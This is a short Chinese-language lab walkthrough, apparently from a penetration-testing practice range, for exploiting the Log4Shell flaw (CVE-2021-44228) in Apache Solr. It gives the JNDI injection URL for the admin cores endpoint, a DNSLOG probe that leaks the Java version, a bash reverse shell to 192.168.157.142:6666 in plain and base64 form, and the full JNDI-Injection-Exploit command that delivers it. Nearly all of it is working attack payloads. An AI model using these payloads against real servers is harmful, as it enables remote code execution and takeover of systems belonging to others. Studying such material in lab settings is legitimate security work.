1.执行以下命令启动靶场环境并在浏览器访问
cd log4j/CVE-2021-44228
docker-compose up -d
docker ps
2.先在自己搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果
3.可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的版本号!
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.tw2rtx.dnslog.cn }
4、开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!
JDNI项⽬地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
反弹shell
bash -i >& /dev/tcp/192.168.157.142/6666 0>&1
反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1Ny4xNDIvNjY2NiAwPiYx
最终Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1Ny4xNDIvNjY2NiAwPiYx }|{base64,-d}|{bash, -i}" -A "192.168.157.142"
5、服务器监听6666端口
6.拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址...
/solr/admin/cores?action=${jndi:ldap://192.168.157.142:1389/ykqar5 } ${jndi:ldap://192.168.157.142:6666/uma7pn}